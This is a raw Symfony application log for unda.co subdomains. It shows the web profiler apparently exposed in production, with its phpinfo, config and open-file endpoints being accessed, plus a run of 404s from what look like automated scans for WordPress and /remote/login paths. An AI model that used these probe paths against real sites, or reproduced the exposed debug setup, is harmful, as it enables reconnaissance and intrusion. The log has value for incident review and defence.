[2025-12-20 21:35:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9c9de9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9c9de9?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:35:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 21:39:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=twig","method":"GET"} []
[2025-12-20 21:39:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 21:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=cache","method":"GET"} []
[2025-12-20 21:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 21:42:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=dump","method":"GET"} []
[2025-12-20 21:42:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 21:43:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=logger","method":"GET"} []
[2025-12-20 21:43:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 21:44:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=config","method":"GET"} []
[2025-12-20 21:44:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 21:49:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 21:49:33] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 21:53:47] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 21:53:47] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 21:53:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 21:53:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:47] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:47] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 21:53:47] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 21:53:47] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 21:53:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 21:53:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 21:53:49] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 21:53:49] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 21:53:50] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 21:53:50] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 21:53:50] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:50] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:50] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 21:53:50] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 21:53:50] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 21:53:51] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 21:53:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:53:58] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 21:53:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 21:53:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 21:53:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 21:53:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 21:53:58] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 21:53:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 21:54:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=twig","method":"GET"} []
[2025-12-20 21:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 21:55:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=security","method":"GET"} []
[2025-12-20 21:55:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 21:55:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=security","method":"GET"} []
[2025-12-20 21:55:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 22:00:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?ip=66.249.77.32&limit=10","method":"GET"} []
[2025-12-20 22:00:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?ip=66.249.77.32&limit=10","method":"GET"} []
[2025-12-20 22:05:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f2b816","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/f2b816?panel=cache","method":"GET"} []
[2025-12-20 22:05:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 22:07:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fswiftmailer-bundle&line=0","method":"GET"} []
[2025-12-20 22:07:51] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FSecurityBundle&line=0","method":"GET"} []
[2025-12-20 22:09:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6daf42","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/6daf42?panel=db","method":"GET"} []
[2025-12-20 22:09:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 22:09:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4daf2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4daf2f?panel=config","method":"GET"} []
[2025-12-20 22:09:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 22:11:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=time","method":"GET"} []
[2025-12-20 22:11:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 22:13:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:14:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-20 22:15:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
